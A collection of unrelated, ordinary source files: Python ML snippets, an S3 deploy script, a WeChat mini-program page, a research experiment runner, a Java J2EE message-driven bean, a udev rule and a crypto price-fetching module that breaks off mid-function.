            regularization_term = (self.lambdaRate / (2 * self.m)) * np.sum(np.power(theta, 2))
            regularized_cost = cost + regularization_term
            return regularized_cost
        else:
            return cost
    def compute_cost(self, theta, classIndex):
        # Half mean squared error against the labels for classIndex,
        # optionally regularized.
        y = self.get_labeled_set(classIndex)
        distances = self.compute_distances(theta, y)
        costMatrix = np.power(distances, 2)
        cost = (1 / (2 * float(self.m))) * np.sum(costMatrix)
        if (self.lambdaRate > 0.0):
            cost = self.regularize_cost(cost, theta)
        return cost
#!/bin/bash
# fail the build on any failed command
set -e

# Print usage and abort.
# NOTE: '[-p]' was advertised here but is not accepted by the getopts loop
# below ("e:v:b:"), so it has been removed from the usage string.
usage() {
  echo "usage: $0 [-e <path/to/file>] [-v <version string>] [-b <path/to/build>]" 1>&2
  exit 1
}

# default build directory
BUILD="dist/"
# default version
REACT_APP_VERSION="latest"
# validates versioning e.g. v0.1.0
validate_version() {
  # accepted shapes: v1, v1.2, v1.2.3 — numeric components, '*' wildcard allowed
  rx='^v([0-9]+\.){0,2}(\*|[0-9]+)$'
  if [[ ! $1 =~ $rx ]]; then
    echo "error: unable to validate version '$1'" 1>&2
    echo "format is '${rx}'"
    exit 1
  fi
  echo "info: validated version $1"
  REACT_APP_VERSION=$1
}
# validates that build directory exists
# validates that build directory exists
validate_build() {
  # quote "$1" so paths with spaces (or an empty argument) don't break the test
  if [ -d "$1" ]; then
    echo "info: validated build directory $1"
    BUILD=$1
  else
    echo "error: build directory '$1' does not exist" 1>&2
    exit 1
  fi
}
# validates that environment file exists
# validates that environment file exists and sources it into this shell
validate_env() {
  # quote "$1" so paths with spaces (or an empty argument) don't break the test
  if [ -f "$1" ]; then
    echo "info: validated environment file $1"
    source "$1"
  else
    echo "error: environment file '$1' does not exist" 1>&2
    exit 1
  fi
}
# parse command line arguments
while getopts "e:v:b:" opt; do
  case ${opt} in
    e)
      e=${OPTARG}
      validate_env ${e}
      ;;
    b)
      b=${OPTARG}
      validate_build ${b}
      ;;
    v)
      v=${OPTARG}
      validate_version ${v}
      ;;
    \?)
      echo "error: invalid option '-$OPTARG'" 1>&2
      exit 1
      ;;
  esac
done
# ensure the correct variables are defined
# (either exported by the caller or sourced from the -e environment file)
if \
  [ -z "${REACT_APP_HOST}" ] || \
  [ -z "${REACT_APP_GRAASP_DEVELOPER_ID}" ] || \
  [ -z "${REACT_APP_GRAASP_APP_ID}" ]; then
  echo "error: environment variables REACT_APP_GRAASP_APP_ID, REACT_APP_GRAASP_DEVELOPER_ID and/or REACT_APP_HOST are not defined" 1>&2
  echo "error: you can specify them through a .env file in the app root folder" 1>&2
  echo "error: or through another file specified with the -e flag" 1>&2
  exit 1
fi
# ensure the correct aws credentials are defined
if \
  [ -z "${BUCKET}" ] || \
  [ -z "${AWS_ACCESS_KEY_ID}" ] || \
  [ -z "${AWS_SECRET_ACCESS_KEY}" ]; then
  echo "error: environment variables BUCKET, AWS_ACCESS_KEY_ID and/or AWS_SECRET_ACCESS_KEY are not defined" 1>&2
  echo "error: make sure you setup your credentials file correctly using the scripts/setup.sh script" 1>&2
  echo "error: and contact your favourite Graasp engineer if you keep running into trouble" 1>&2
  exit 1
fi
# re-export so the aws CLI invoked below sees the credentials
export AWS_ACCESS_KEY_ID=${AWS_ACCESS_KEY_ID}
export AWS_SECRET_ACCESS_KEY=${AWS_SECRET_ACCESS_KEY}
echo "info: publishing app ${REACT_APP_GRAASP_APP_ID} version ${REACT_APP_VERSION}"
APP_DIR=${BUCKET}/${REACT_APP_GRAASP_DEVELOPER_ID}/${REACT_APP_GRAASP_APP_ID}/${REACT_APP_VERSION}/
# make sure you do not use the word PATH as a variable because it overrides the PATH environment variable
APP_PATH=${REACT_APP_GRAASP_DEVELOPER_ID}/${REACT_APP_GRAASP_APP_ID}/${REACT_APP_VERSION}
# sync s3 bucket (--delete removes remote files no longer present in BUILD)
aws s3 sync ${BUILD} s3://${APP_DIR} --delete
# todo: allow cache invalidations per app once it is supported by cloudfront
# see: https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_aws-services-that-work-with-iam.html
# ensure the correct distribution variables are defined
#if \
#  [ -z "${DISTRIBUTION}" ]; then
#  echo "error: environment variable DISTRIBUTION is not defined" 1>&2
#  echo "error: contact your favourite Graasp engineer if you keep running into trouble" 1>&2
#  exit 1
#fi
# invalidate cloudfront distribution
# aws cloudfront create-invalidation --distribution-id ${DISTRIBUTION} --paths /${APP_PATH}/*
|
import {
maintenanceReminder,
logOutRequest
} from '../../lib/api';
// App instance providing shared UI helpers (loading indicator, toasts).
const App = getApp();
Page({
  /**
   * Initial page data.
   */
  data: {
    errorStatus: null,
    maintainMileage: "",
    distance: "",
  },
  /**
   * Lifecycle hook -- page load.
   */
  onLoad: function (options) {
  },
  /**
   * Refresh the maintenance-reminder information.
   */
  updateMaintenance(){
    App.showLoading("数据正在更新");
    maintenanceReminder().then(res => {
      if(res){
        // maintainMileage: mileage until next service; distance: total mileage
        let { maintainMileage, distance } = res;
        this.setData({
          maintainMileage,
          distance,
          errorStatus: false
        }, () => {
          // hide the loading indicator shortly after the view has updated
          const timer = setTimeout(() => {
            wx.hideLoading();
            clearTimeout(timer);
          }, 300);
        })
      }
    }, () => {
      // request rejected: flag the error so the view can show an error state
      this.setData({
        errorStatus: true
      })
    })
  },
  /**
   * Navigate to the change-password page.
   */
  goUpdatePasswd() {
    wx.navigateTo({
      url: '/pages/password/password',
    })
  },
  /**
   * Log out: invalidate the stored token, then relaunch to the index page.
   */
  loginOut(){
    const userToken = wx.getStorageSync('userToken');
    if(userToken){
      App.showLoading("请稍后");
      logOutRequest({token: userToken}).then(() => {
        wx.hideLoading();
        App.showToast("退出成功", 500);
        getApp().globalData.scale = 3;
        // wait for the toast to finish before relaunching
        const timer = setTimeout(() => {
          clearTimeout(timer);
          wx.reLaunch({
            url: '/pages/index/index'
          })
        }, 500);
      })
    }
  },
  /**
   * Lifecycle hook -- page show; data is refreshed every time the page appears.
   */
  onShow: function () {
    this.updateMaintenance();
  },
  /**
   * Lifecycle hook -- page hide.
   */
  onHide: function () {
  },
  /**
   * Lifecycle hook -- page unload.
   */
  onUnload: function () {
  }
})
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
# Load the data: expects data.csv with 'Market Index', 'Interest Rates'
# and 'Price' columns in the working directory.
data = pd.read_csv("data.csv")
X = data[['Market Index','Interest Rates']].values
y = data['Price'].values
# Split the data into training and test sets
# (80/20 split; fixed random_state for reproducibility)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
# Train the model (ordinary least-squares linear regression)
regressor = LinearRegression()
regressor.fit(X_train, y_train)
# Predict the stock price for the held-out test samples
y_pred = regressor.predict(X_test)
def remove_duplicates(strs):
    """Return a new list with duplicate entries removed.

    First occurrences are kept and their original order is preserved.
    Runs in O(n); the original list-membership scan was O(n^2).

    Args:
        strs: iterable of hashable items (e.g. strings).

    Returns:
        A new list with each distinct item once, in first-seen order.
    """
    # dict preserves insertion order (Python 3.7+), so its keys are exactly
    # the de-duplicated sequence in original order.
    return list(dict.fromkeys(strs))
# Driver Code: demonstrate de-duplication on a sample list of greetings.
strs = ["Hello", "World", "Hello", "Goodbye", "Goodbye", "Welcome"]
print(remove_duplicates(strs))
#!/bin/bash
# ========== Experiment Seq. Idx. 755 / 37.5.1 / N. 48/6/1 - _S=37.5.1 D1_N=48 a=-1 b=-1 c=-1 d=-1 e=-1 f=1 D3_N=6 g=1 h=1 i=-1 D4_N=1 j=1 ==========
# Abort on use of undefined variables (catches template-expansion mistakes).
set -u
# Prints header
echo -e '\n\n========== Experiment Seq. Idx. 755 / 37.5.1 / N. 48/6/1 - _S=37.5.1 D1_N=48 a=-1 b=-1 c=-1 d=-1 e=-1 f=1 D3_N=6 g=1 h=1 i=-1 D4_N=1 j=1 ==========\n\n'
# Generated-code sanity check: this condition is constant-folded by the
# experiment generator and should never be true.
if [[ "Yes" == "No" ]]; then
  echo 'FATAL: This treatment did not include an SVM layer.'>&2
  echo ' Something very wrong happened!'>&2
  exit 161
fi
# Prepares all environment variables
JBHI_DIR="$HOME/jbhi-special-issue"
DATASET_DIR="$JBHI_DIR/data/challenge-val-seg.305.tfr"
MODEL_DIR="$JBHI_DIR/models/deep.48"
SVM_DIR="$JBHI_DIR/svm-models"
SVM_PREFIX="$SVM_DIR/deep.48.layer.6.svm"
SVM_PATH="$SVM_PREFIX.pkl"
FEATURES_DIR="$JBHI_DIR/features"
TEST_FEATURES_PREFIX="$FEATURES_DIR/deep.48.layer.6.test.1.index.1999.test"
TEST_FEATURES_PATH="$TEST_FEATURES_PREFIX.feats.pkl"
RESULTS_DIR="$JBHI_DIR/results"
RESULTS_PREFIX="$RESULTS_DIR/deep.48.layer.6.test.1.index.1999.svm"
RESULTS_PATH="$RESULTS_PREFIX.results.txt"
# ...variables expected by jbhi-checks.include.sh and jbhi-footer.include.sh
SOURCES_GIT_DIR="$JBHI_DIR/jbhi-special-issue"
LIST_OF_INPUTS="$DATASET_DIR/finish.txt:$MODEL_DIR/finish.txt:$SVM_PREFIX.finish.txt"
START_PATH="$RESULTS_PREFIX.start.txt"
FINISH_PATH="$RESULTS_PREFIX.finish.txt"
LOCK_PATH="$RESULTS_PREFIX.running.lock"
LAST_OUTPUT="$RESULTS_PATH"
# ...creates mid-way checkpoint after the expensive test features extraction
SEMIFINISH_PATH="$TEST_FEATURES_PREFIX.finish.txt"
# EXPERIMENT_STATUS=1
# STARTED_BEFORE=No
mkdir -p "$FEATURES_DIR"
mkdir -p "$RESULTS_DIR"
#
# Assumes that the following environment variables where initialized
# SOURCES_GIT_DIR="$JBHI_DIR/jbhi-special-issue"
# LIST_OF_INPUTS="$DATASET_DIR/finish.txt:$MODELS_DIR/finish.txt:"
# START_PATH="$OUTPUT_DIR/start.txt"
# FINISH_PATH="$OUTPUT_DIR/finish.txt"
# LOCK_PATH="$OUTPUT_DIR/running.lock"
# LAST_OUTPUT="$MODEL_DIR/[[[:D1_MAX_NUMBER_OF_STEPS:]]].meta"
EXPERIMENT_STATUS=1
STARTED_BEFORE=No
# Checks if code is stable, otherwise alerts scheduler
pushd "$SOURCES_GIT_DIR" >/dev/null
GIT_STATUS=$(git status --porcelain)
GIT_COMMIT=$(git log | head -n 1)
popd >/dev/null
if [ "$GIT_STATUS" != "" ]; then
  echo 'FATAL: there are uncommitted changes in your git sources file' >&2
  echo ' for reproducibility, experiments only run on committed changes' >&2
  echo >&2
  echo ' Git status returned:'>&2
  echo "$GIT_STATUS" >&2
  exit 162
fi
# The experiment is already finished - exits with special code so scheduler won't retry
if [[ "$FINISH_PATH" != "-" ]]; then
  if [[ -e "$FINISH_PATH" ]]; then
    echo 'INFO: this experiment has already finished' >&2
    exit 163
  fi
fi
# The experiment is not ready to run due to dependencies - alerts scheduler
if [[ "$LIST_OF_INPUTS" != "" ]]; then
  # LIST_OF_INPUTS is a ':'-separated list of prerequisite marker files
  IFS=':' tokens_of_input=( $LIST_OF_INPUTS )
  input_missing=No
  for input_to_check in ${tokens_of_input[*]}; do
    if [[ ! -e "$input_to_check" ]]; then
      echo "ERROR: input $input_to_check missing for this experiment" >&2
      input_missing=Yes
    fi
  done
  if [[ "$input_missing" != No ]]; then
    exit 164
  fi
fi
# Sets trap to return error code if script is interrupted before successful finish
LOCK_SUCCESS=No
FINISH_STATUS=161
# Exit handler: releases the lock (when held) and translates the internal
# FINISH_STATUS into the script's exit code. On failure the finish marker is
# removed so the scheduler will retry the experiment.
function finish_trap {
  if [[ "$LOCK_SUCCESS" == "Yes" ]]; then
    rmdir "$LOCK_PATH" &> /dev/null
  fi
  case "$FINISH_STATUS" in
    165)
      echo 'WARNING: experiment discontinued because other process holds its lock' >&2
      ;;
    160)
      echo 'INFO: experiment finished successfully' >&2
      ;;
    *)
      [[ "$FINISH_PATH" != "-" ]] && rm -f "$FINISH_PATH"
      echo 'ERROR: an error occurred while executing the experiment' >&2
      ;;
  esac
  exit "$FINISH_STATUS"
}
trap finish_trap EXIT
# While running, locks experiment so other parallel threads won't attempt to run it too
# (mkdir is atomic, so it doubles as a mutex)
if mkdir "$LOCK_PATH" --mode=u=rwx,g=rx,o=rx &>/dev/null; then
  LOCK_SUCCESS=Yes
else
  echo 'WARNING: this experiment is already being executed elsewhere' >&2
  FINISH_STATUS="165"
  exit
fi
# If the experiment was started before, do any cleanup necessary
if [[ "$START_PATH" != "-" ]]; then
  if [[ -e "$START_PATH" ]]; then
    echo 'WARNING: this experiment is being restarted' >&2
    STARTED_BEFORE=Yes
  fi
  #...marks start
  date -u >> "$START_PATH"
  echo GIT "$GIT_COMMIT" >> "$START_PATH"
fi
#...gets closest checkpoint file
# (picks the checkpoint number closest to the target step count t=30000)
MODEL_CHECKPOINT=$(ls "$MODEL_DIR/"model.ckpt-*.index | \
  sed 's/.*ckpt-\([0-9]*\)\..*/\1/' | \
  sort -n | \
  awk -v c=1 -v t=30000 \
  'NR==1{d=$c-t;d=d<0?-d:d;v=$c;next}{m=$c-t;m=m<0?-m:m}m<d{d=m;v=$c}END{print v}')
MODEL_PATH="$MODEL_DIR/model.ckpt-$MODEL_CHECKPOINT"
echo "$MODEL_PATH" >> "$START_PATH"
if [[ ! -f "$SEMIFINISH_PATH" ]]; then
  #...performs preliminary feature extraction
  echo Extracting SVM test features with "$MODEL_PATH"
  python \
    "$SOURCES_GIT_DIR/predict_image_classifier.py" \
    --model_name="resnet_v2_101_seg" \
    --checkpoint_path="$MODEL_PATH" \
    --dataset_name=skin_lesions \
    --task_name=label \
    --dataset_split_name=test \
    --preprocessing_name=dermatologic \
    --aggressive_augmentation="False" \
    --add_rotations="False" \
    --minimum_area_to_crop="0.05" \
    --normalize_per_image="0" \
    --batch_size=1 \
    --id_field_name=id \
    --pool_features=avg \
    --extract_features \
    --output_format=pickle \
    --add_scores_to_features=none \
    --eval_replicas="1" \
    --output_file="$TEST_FEATURES_PATH" \
    --dataset_dir="$DATASET_DIR"
  # Tip: leave last the arguments that make the command fail if they're absent,
  # so if there's a typo or forgotten \ the entire thing fails
  EXPERIMENT_STATUS="$?"
  if [[ "$EXPERIMENT_STATUS" != "0" || ! -e "$TEST_FEATURES_PATH" ]]; then
    exit
  fi
  # mark the mid-way checkpoint so a restart can skip the extraction above
  date -u >> "$SEMIFINISH_PATH"
  echo GIT "$GIT_COMMIT" >> "$SEMIFINISH_PATH"
else
  echo Reloading features from "$TEST_FEATURES_PATH"
fi
#...performs prediction with SVM model
python \
  "$SOURCES_GIT_DIR/predict_svm_layer.py" \
  --output_file "$RESULTS_PATH" \
  --input_test "$TEST_FEATURES_PATH" \
  --input_model "$SVM_PATH"
# Tip: leave last the arguments that make the command fail if they're absent,
# so if there's a typo or forgotten \ the entire thing fails
EXPERIMENT_STATUS="$?"
#
#...starts training
# (marks success only if the expected output file actually exists)
if [[ "$EXPERIMENT_STATUS" == "0" ]]; then
  if [[ "$LAST_OUTPUT" == "" || -e "$LAST_OUTPUT" ]]; then
    if [[ "$FINISH_PATH" != "-" ]]; then
      date -u >> "$FINISH_PATH"
      echo GIT "$GIT_COMMIT" >> "$FINISH_PATH"
    fi
    FINISH_STATUS="160"
  fi
fi
import unittest
from you_get.common import any_download
class WeishiTest(unittest.TestCase):
    """Smoke test: download one Bilibili video via you_get's dispatcher."""

    def test_download(self):
        # Network-dependent: performs a real download into the current directory.
        # NOTE(review): the query string contains '×tamp' (U+00D7 times sign) —
        # this looks like a mojibake of '&timestamp'; confirm against the
        # original share URL before relying on it.
        any_download('https://www.bilibili.com/video/BV14v411W7F8?p=1&share_medium=iphone&share_plat=ios&share_session_id=9E81771B-C798-47AB-A238-29AED9C5CF3F&share_source=WEIXIN&share_tag=s_i×tamp=1630235462&unique_k=5eOjdD', merge=True, info_only=False, output_dir='.')
|
/*
* Copyright 2002 Sun Microsystems, Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* - Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* - Redistribution in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* Neither the name of Sun Microsystems, Inc. or the names of
* contributors may be used to endorse or promote products derived
* from this software without specific prior written permission.
*
* This software is provided "AS IS," without a warranty of any
* kind. ALL EXPRESS OR IMPLIED CONDITIONS, REPRESENTATIONS AND
* WARRANTIES, INCLUDING ANY IMPLIED WARRANTY OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE OR NON-INFRINGEMENT, ARE HEREBY
* EXCLUDED. SUN AND ITS LICENSORS SHALL NOT BE LIABLE FOR ANY DAMAGES
* SUFFERED BY LICENSEE AS A RESULT OF USING, MODIFYING OR
* DISTRIBUTING THE SOFTWARE OR ITS DERIVATIVES. IN NO EVENT WILL SUN
* OR ITS LICENSORS BE LIABLE FOR ANY LOST REVENUE, PROFIT OR DATA, OR
* FOR DIRECT, INDIRECT, SPECIAL, CONSEQUENTIAL, INCIDENTAL OR
* PUNITIVE DAMAGES, HOWEVER CAUSED AND REGARDLESS OF THE THEORY OF
* LIABILITY, ARISING OUT OF THE USE OF OR INABILITY TO USE SOFTWARE,
* EVEN IF SUN HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
*
* You acknowledge that Software is not designed, licensed or intended
* for use in the design, construction, operation or maintenance of
* any nuclear facility.
*/
package com.sun.j2ee.blueprints.opc.ejb;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Date;
import java.util.Iterator;
import java.net.URL;
import javax.ejb.EJBException;
import javax.ejb.CreateException;
import javax.ejb.FinderException;
import javax.ejb.MessageDrivenBean;
import javax.ejb.MessageDrivenContext;
import javax.naming.Context;
import javax.naming.NamingException;
import javax.jms.*;
import com.sun.j2ee.blueprints.xmldocuments.OrderApproval;
import com.sun.j2ee.blueprints.xmldocuments.ChangedOrder;
import com.sun.j2ee.blueprints.xmldocuments.XMLDocumentException;
import com.sun.j2ee.blueprints.xmldocuments.tpa.TPASupplierOrderXDE;
import com.sun.j2ee.blueprints.processmanager.ejb.ProcessManagerLocalHome;
import com.sun.j2ee.blueprints.processmanager.ejb.ProcessManagerLocal;
import com.sun.j2ee.blueprints.processmanager.ejb.OrderStatusNames;
import com.sun.j2ee.blueprints.contactinfo.ejb.ContactInfoLocal;
import com.sun.j2ee.blueprints.contactinfo.ejb.ContactInfoLocalHome;
import com.sun.j2ee.blueprints.address.ejb.AddressLocal;
import com.sun.j2ee.blueprints.address.ejb.AddressLocalHome;
import com.sun.j2ee.blueprints.lineitem.ejb.LineItemLocal;
import com.sun.j2ee.blueprints.lineitem.ejb.LineItemLocalHome;
import com.sun.j2ee.blueprints.lineitem.ejb.LineItem;
import com.sun.j2ee.blueprints.purchaseorder.ejb.PurchaseOrderLocalHome;
import com.sun.j2ee.blueprints.purchaseorder.ejb.PurchaseOrderLocal;
import com.sun.j2ee.blueprints.servicelocator.ServiceLocatorException;
import com.sun.j2ee.blueprints.servicelocator.ejb.ServiceLocator;
import com.sun.j2ee.blueprints.opc.transitions.*;
import com.sun.j2ee.blueprints.processmanager.transitions.*;
/**
 * OrderApprovalMDB receives a JMS message containing a list of
 * orders that have been updated. It updates the purchase-order EJB's
 * state based on the status of each order. For every approved order
 * a supplier purchase order is built and sent to a supplier, and a
 * batch of order-approval status notices is sent to the customer
 * relations department, which handles emailing the customers.
 */
public class OrderApprovalMDB implements MessageDrivenBean, MessageListener {
    private Context context;
    private MessageDrivenContext mdc;
    private TransitionDelegate transitionDelegate;
    private ProcessManagerLocal processManager;
    private TPASupplierOrderXDE supplierOrderXDE;
    private PurchaseOrderLocalHome poHome;
    private URL entityCatalogURL;
    private boolean validateXmlOrderApproval;

    /** Inner class used to hold the return
     * values of the doWork method.
     **/
    private class WorkResult {
        ArrayList supplierPoList;
        String xmlMailOrderApprovals;
        WorkResult(String xmlMailOrderApprovals, ArrayList supplierPoList) {
            this.xmlMailOrderApprovals = xmlMailOrderApprovals;
            this.supplierPoList = supplierPoList;
        }
    }

    public OrderApprovalMDB() {
    }

    /**
     * Looks up the EJB homes and configuration values this MDB needs and
     * prepares the transition delegate and supplier-order XML editor.
     * Failures are wrapped in EJBException for the container to handle.
     */
    public void ejbCreate() {
        try {
            ServiceLocator serviceLocator = new ServiceLocator();
            poHome = (PurchaseOrderLocalHome)serviceLocator.getLocalHome(JNDINames.PURCHASE_ORDER_EJB);
            ProcessManagerLocalHome pmlh = (ProcessManagerLocalHome)serviceLocator.getLocalHome(JNDINames.PROCESS_MANAGER_EJB);
            processManager = pmlh.create();
            entityCatalogURL = serviceLocator.getUrl(JNDINames.XML_ENTITY_CATALOG_URL);
            validateXmlOrderApproval = serviceLocator.getBoolean(JNDINames.XML_VALIDATION_ORDER_APPROVAL);
            String tdClassName = serviceLocator.getString(JNDINames.TRANSITION_DELEGATE_ORDER_APPROVAL);
            TransitionDelegateFactory tdf = new TransitionDelegateFactory();
            transitionDelegate = tdf.getTransitionDelegate(tdClassName);
            transitionDelegate.setup();
            supplierOrderXDE = new TPASupplierOrderXDE(entityCatalogURL,
                                                       serviceLocator.getBoolean(JNDINames.XML_XSD_VALIDATION));
        } catch (TransitionException te) {
            throw new EJBException(te);
        } catch (ServiceLocatorException se) {
            throw new EJBException(se);
        } catch (CreateException ce) {
            throw new EJBException(ce);
        } catch (XMLDocumentException xde) {
            throw new EJBException(xde);
        }
    }

    /**
     * Process a list of order status updates for customer orders.
     *
     * @param recvMsg a JMS TextMessage containing an OrderApproval document
     *        that lists orders and their status updates, such as APPROVED
     *        or DENIED.
     */
    public void onMessage(Message recvMsg) {
        TextMessage recdTM = null;
        String recdText = null;
        WorkResult result = null;
        try {
            recdTM = (TextMessage)recvMsg;
            recdText = recdTM.getText();
            result = doWork(recdText);
            doTransition(result.supplierPoList, result.xmlMailOrderApprovals);
        } catch(TransitionException te) {
            throw new EJBException(te);
        } catch(XMLDocumentException xde) {
            throw new EJBException(xde);
        }catch (JMSException je) {
            throw new EJBException(je);
        } catch(FinderException ce) {
            throw new EJBException(ce);
        }
    }

    public void setMessageDrivenContext(MessageDrivenContext mdc) {
        this.mdc = mdc;
    }

    public void ejbRemove() {
    }

    /**
     * Process the list of order approvals and update database. Send a
     * PurchaseOrder to a supplier for each approved order. Also generate
     * a list of approved or denied orders.
     *
     * @param xmlMessage the XML OrderApproval document received via JMS
     * @return a list of valid order approvals/denials to be sent
     *         to customer relations, together with the list of Purchase
     *         Orders to send to the supplier to fulfill the order
     */
    private WorkResult doWork(String xmlMessage) throws XMLDocumentException, FinderException {
        ArrayList supplierPoList = new ArrayList();
        PurchaseOrderLocal po = null;
        OrderApproval approval = null;
        approval = OrderApproval.fromXML(xmlMessage, entityCatalogURL, validateXmlOrderApproval);
        //generate list of valid orders to return
        OrderApproval oaMailList = new OrderApproval();
        String xmlMailOrderApprovals = null;
        Collection coll = approval.getOrdersList();
        Iterator it = coll.iterator();
        while(it!= null && it.hasNext()) {
            ChangedOrder co = (ChangedOrder) it.next();
            // only PENDING orders can be updated:
            // if the order is already APPROVED, DENIED or COMPLETED it has
            // already been processed, so don't process it again
            String curStatus = processManager.getStatus(co.getOrderId());
            if(!curStatus.equals(OrderStatusNames.PENDING)) {
                continue;
            }
            //generate list of valid orders to return
            //list contains orders to notify the customer of
            //order status changes. List is sent to customer
            //relations for emailing.
            oaMailList.addOrder(co);
            //update process manager
            //for this purchase order workflow
            processManager.updateStatus(co.getOrderId(), co.getOrderStatus());
            //for all approved orders, send a PO to supplier
            if(co.getOrderStatus().equals(OrderStatusNames.APPROVED)) {
                po = poHome.findByPrimaryKey(co.getOrderId());
                String xmlPO = getXmlPO(po, supplierOrderXDE);
                supplierPoList.add(xmlPO);
            }
        }//end while
        xmlMailOrderApprovals = oaMailList.toXML();
        return new WorkResult(xmlMailOrderApprovals, supplierPoList);
    }

    /**
     * Send Purchase Orders to supplier to fulfill a customer order and
     * also send a list of approvals/denials to customer service to send emails
     *
     * @param supplierPoList is the list of Purchase Orders to send to supplier
     * @param xmlMailOrderApprovals is the list of approvals/denials to send to customers
     */
    private void doTransition(Collection supplierPoList, String xmlMailOrderApprovals) throws TransitionException {
        TransitionInfo info = new TransitionInfo(xmlMailOrderApprovals, supplierPoList);
        transitionDelegate.doTransition(info);
    }

    /**
     * Given a PO, gets all its info and builds the Supplier PO.
     *
     * @param po the purchase order to convert
     * @param supplierOrderXDE the XML document editor used to build the order
     * @return the Supplier PO in XML format
     */
    private String getXmlPO(PurchaseOrderLocal po, TPASupplierOrderXDE supplierOrderXDE) throws XMLDocumentException{
        supplierOrderXDE.newDocument();
        supplierOrderXDE.setOrderId(po.getPoId());
        Date tmpDate = new Date(po.getPoDate());
        supplierOrderXDE.setOrderDate(tmpDate);
        ContactInfoLocal cinfo = po.getContactInfo();
        AddressLocal addr = cinfo.getAddress();
        supplierOrderXDE.setShippingAddress(cinfo.getGivenName(), cinfo.getFamilyName(),
                                            addr.getStreetName1(), addr.getCity(),
                                            addr.getState(), addr.getCountry(),
                                            addr.getZipCode(), cinfo.getEmail(), cinfo.getTelephone());
        //Collection liColl = po.getAllItems();
        Collection liColl = po.getData().getLineItems();
        Iterator liIt = liColl.iterator();
        while((liIt != null) && (liIt.hasNext())) {
            LineItem li = (LineItem) liIt.next();
            supplierOrderXDE.addLineItem(li.getCategoryId(), li.getProductId(), li.getItemId(),
                                         li.getLineNumber(), li.getQuantity(), li.getUnitPrice());
        }
        return supplierOrderXDE.getDocumentAsString();
    }
}
|
# Install a udev rule for the RPLIDAR's CP210x USB-serial adapter
# (vendor 10c4 / product ea60): world read-write, dialout group, and a
# stable /dev/rplidar symlink.
echo 'KERNEL=="ttyUSB*", ATTRS{idVendor}=="10c4", ATTRS{idProduct}=="ea60", MODE:="0666", GROUP:="dialout", SYMLINK+="rplidar"' >/etc/udev/rules.d/rplidar.rules
# Reload and restart udev so the rule takes effect without replugging.
service udev reload
sleep 2
service udev restart
|
<reponame>hunterbdm/crypto-streamdeck<filename>classes/data.js<gh_stars>1-10
const request = require('request');
const WebSocket = require('ws');
// Shared data module: caches the coin list and per-exchange pair lists,
// and exposes price-fetching helpers (attached below).
let data = {};
// NOTE(review): `lastBTCPrice` is never assigned or read in this chunk —
// presumably used elsewhere; confirm before removing.
let lastBTCPrice;
data.allCoins = [];
data.binancePairs = [];
data.bittrexPairs = [];
data.cryptopiaPairs = [];
/*
Upstream endpoints used by this module:
https://api.coinmarketcap.com/v1/ticker/?limit=2000
https://www.cryptopia.co.nz/api/GetMarkets
https://api.binance.com/api/v1/ticker/allBookTickers
https://bittrex.com/api/v1.1/public/getmarkets
*/
// Fetch the last traded price for `ticker` (e.g. "DOT/BTC") from Cryptopia's
// full market list and pass the formatted price string to `callback`.
// On any error the failure is logged and `callback` is never invoked.
// NOTE(review): `log` and `t` (lookup/format helpers) are globals defined
// elsewhere in the app — confirm their contracts.
data.getPriceCryptopia = function(ticker, callback) {
    request({
        method: 'get',
        url: `https://www.cryptopia.co.nz/api/GetMarkets`
    }, (err, resp, body) => {
        if (err) {
            log(`Error when pulling ${ticker} data: ${err}`, 'error');
        }
        else if (resp.statusCode != 200) {
            log(`Bad res(${resp.statusCode}) when pulling ${ticker} data`, 'error');
        }
        else {
            try {
                body = JSON.parse(body).Data;
                let c = t.find(body, {Label: ticker});
                if (!c) return log(`${ticker} could not be found on cryptopia`, 'error');
                // USDT pairs are formatted as dollars, everything else as satoshis
                if (ticker.includes('/USDT'))
                    return callback(t.fixUsd(c.LastPrice.toString()));
                else
                    return callback(t.fixSats(c.LastPrice.toString()));
            }
            catch(err) {
                log(`Failed to parse ${ticker} data: ${err}`, 'error');
            }
        }
    })
}
// Fetch the 24h ticker for `ticker` from Binance (pair symbol is the ticker
// with the '/' removed) and pass the formatted last price to `callback`.
// On any error the failure is logged and `callback` is never invoked.
data.getPriceBinance = function(ticker, callback) {
    request({
        method: 'get',
        url: `https://api.binance.com/api/v1/ticker/24hr`,
        qs: {
            symbol: ticker.replace('/', '')
        }
    }, (err, resp, body) => {
        if (err) {
            log(`Connection error when pulling ${ticker} data: ${err}`, 'error');
        }
        else if (resp.statusCode != 200) {
            log(`Bad response(${resp.statusCode}) when pulling ${ticker} data`, 'error');
        }
        else {
            try {
                let c = JSON.parse(body);
                // USDT pairs are formatted as dollars, everything else as satoshis
                if (ticker.includes('USDT'))
                    return callback(t.fixUsd(c.lastPrice.toString()));
                else
                    return callback(t.fixSats(c.lastPrice.toString()));
            }
            catch(err) {
                log(`Failed to parse ${ticker} data: ${err}`, 'error');
            }
        }
    })
}
// Fetch the last price for `ticker` from Bittrex (market name uses '-' in
// place of '/') and pass the formatted price to `callback`.
// On any error the failure is logged and `callback` is never invoked.
data.getPriceBittrex = function(ticker, callback) {
    request({
        method: 'get',
        url: `https://bittrex.com/api/v1.1/public/getticker`,
        qs: {
            market: ticker.replace('/', '-')
        }
    }, (err, resp, body) => {
        if (err) {
            log(`Connection error when pulling ${ticker} data: ${err}`, 'error');
        }
        else if (resp.statusCode != 200) {
            log(`Bad response(${resp.statusCode}) when pulling ${ticker} data`, 'error');
        }
        else {
            try {
                body = JSON.parse(body);
                // USDT pairs are formatted as dollars, everything else as satoshis
                if (ticker.includes('USDT'))
                    return callback(t.fixUsd(body.result.Last.toString()));
                else
                    return callback(t.fixSats(body.result.Last.toString()));
            }
            catch(err) {
                log(`Failed to parse ${ticker} data: ${err}`, 'error');
            }
        }
    })
}
// Pull the full coin list from CoinMarketCap and push it to the renderer
// via `mainWin` (Electron BrowserWindow, defined elsewhere — confirm).
// Retries forever with a 1s delay on any failure.
data.getAllCoins = function() {
